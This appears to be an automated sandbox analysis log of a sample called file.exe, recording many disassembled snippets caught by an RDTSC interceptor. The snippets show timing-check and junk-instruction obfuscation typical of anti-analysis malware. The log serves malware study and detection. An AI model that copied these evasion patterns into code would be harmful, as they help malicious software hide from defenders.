Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F063D second address: 10F064D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0DECD24168h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F07A1 second address: 10F07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F07A7 second address: 10F07C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0DECD2416Ch 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F0DECD24166h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F07C4 second address: 10F07C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F07C9 second address: 10F07D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0DECD24166h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F07D5 second address: 10F07DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F07DB second address: 10F07EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0DECD2416Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F07EC second address: 10F0800 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DED622D76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F094E second address: 10F095A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0DECD24166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F095A second address: 10F0977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D86h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0C08 second address: 10F0C1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0DC0 second address: 10F0DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D80h 0x00000007 jmp 00007F0DED622D85h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F0DED622D76h 0x00000017 ja 00007F0DED622D76h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0DFA second address: 10F0DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0DFF second address: 10F0E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0DED622D76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0E09 second address: 10F0E13 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0DECD24166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F0E13 second address: 10F0E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F34EC second address: 10F355B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DECD24173h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F0DECD2416Fh 0x00000013 nop 0x00000014 push esi 0x00000015 mov dword ptr [ebp+122D1C96h], edx 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e sub dword ptr [ebp+122D1C5Bh], edi 0x00000024 jnl 00007F0DECD2416Bh 0x0000002a add di, 5B91h 0x0000002f call 00007F0DECD24169h 0x00000034 jmp 00007F0DECD2416Ah 0x00000039 push eax 0x0000003a ja 00007F0DECD2416Ah 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 push eax 0x00000048 pop eax 0x00000049 pop edi 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F355B second address: 10F356B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ebx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F356B second address: 10F357E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F0DECD24166h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F362C second address: 10F3631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F3808 second address: 10F3824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F0DECD24173h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F3824 second address: 10F385A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0DED622D78h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ch, 3Dh 0x00000027 push 2A826010h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push edx 0x00000031 pop edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F385A second address: 10F3864 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F3864 second address: 10F3906 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 2A826090h 0x0000000f mov ecx, dword ptr [ebp+122D35E7h] 0x00000015 push 00000003h 0x00000017 sbb di, 0765h 0x0000001c push 00000000h 0x0000001e jmp 00007F0DED622D7Ah 0x00000023 jmp 00007F0DED622D7Ah 0x00000028 push 00000003h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F0DED622D78h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 push edx 0x00000045 mov edx, dword ptr [ebp+122D19CDh] 0x0000004b pop edi 0x0000004c call 00007F0DED622D79h 0x00000051 jmp 00007F0DED622D7Ah 0x00000056 push eax 0x00000057 jmp 00007F0DED622D7Ah 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 jmp 00007F0DED622D84h 0x00000065 mov eax, dword ptr [eax] 0x00000067 push eax 0x00000068 push edx 0x00000069 push ecx 0x0000006a jc 00007F0DED622D76h 0x00000070 pop ecx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F3906 second address: 10F390C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F390C second address: 10F3975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F0DED622D7Fh 0x00000014 pop eax 0x00000015 sub dword ptr [ebp+122DB2FEh], ebx 0x0000001b lea ebx, dword ptr [ebp+124593D5h] 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F0DED622D78h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b adc edx, 102DE336h 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11121CF second address: 11121D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11121D8 second address: 11121DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1112653 second address: 111265D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0DECD24166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111265D second address: 1112663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1112663 second address: 1112669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1112669 second address: 1112673 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0DED622D7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1112C25 second address: 1112C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24174h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1112F4B second address: 1112F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1108746 second address: 110874C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110874C second address: 1108759 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1113AA8 second address: 1113AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1113AB1 second address: 1113AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D84h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0DED622D7Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1113AD8 second address: 1113AE2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0DECD24166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1113D79 second address: 1113D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Fh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1116F85 second address: 1116F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0DECD24166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1116048 second address: 111604F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111604F second address: 1116054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111A3A1 second address: 111A3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111A3A5 second address: 111A3AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EE88 second address: 111EE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EE8D second address: 111EEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DECD24177h 0x00000008 jg 00007F0DECD24166h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10DDDB9 second address: 10DDDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E25F second address: 111E294 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0DECD2416Dh 0x0000000f jmp 00007F0DECD24170h 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e push edx 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E294 second address: 111E29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E29D second address: 111E2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E2A1 second address: 111E2BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0DED622D76h 0x00000008 jmp 00007F0DED622D81h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E2BC second address: 111E2C6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0DECD24172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E2C6 second address: 111E2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E2CC second address: 111E2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F0DECD24166h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E48F second address: 111E493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E493 second address: 111E499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E72C second address: 111E732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E732 second address: 111E749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F0DECD24172h 0x0000000b jmp 00007F0DECD2416Ah 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E749 second address: 111E74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E74F second address: 111E753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111E9DE second address: 111EA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0DED622D7Eh 0x00000010 jmp 00007F0DED622D7Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EA04 second address: 111EA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EA15 second address: 111EA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EA1F second address: 111EA43 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0DECD24176h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F0DECD2416Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111EA43 second address: 111EA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnl 00007F0DED622D78h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11204E1 second address: 11204E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1120611 second address: 1120616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1120616 second address: 1120642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DECD24173h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11207CE second address: 11207D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11207D3 second address: 11207FA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0DECD2417Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1121033 second address: 1121045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1121045 second address: 1121060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112131F second address: 112133C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F0DED622D8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DED622D7Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11215BC second address: 11215C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11215C0 second address: 11215C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11215C4 second address: 11215CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11215CA second address: 112160E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0DED622D78h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 call 00007F0DED622D7Fh 0x0000002a mov edi, dword ptr [ebp+122D27A7h] 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112160E second address: 1121614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1126EC1 second address: 1126EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Fh 0x00000009 pop eax 0x0000000a jmp 00007F0DED622D89h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1126EF1 second address: 1126F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0DECD24166h 0x0000000a jmp 00007F0DECD24170h 0x0000000f popad 0x00000010 jnl 00007F0DECD2416Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007F0DECD24166h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1126F27 second address: 1126F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D7Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E2D1B second address: 10E2D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10E2D25 second address: 10E2D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112755B second address: 1127565 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0DECD2416Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1127565 second address: 11275D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1C51h], ecx 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2BC9h], eax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F0DED622D78h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov dword ptr [ebp+122DB34Fh], eax 0x00000039 mov di, bx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F0DED622D89h 0x00000045 jl 00007F0DED622D76h 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11275D0 second address: 11275D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11275D6 second address: 11275DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
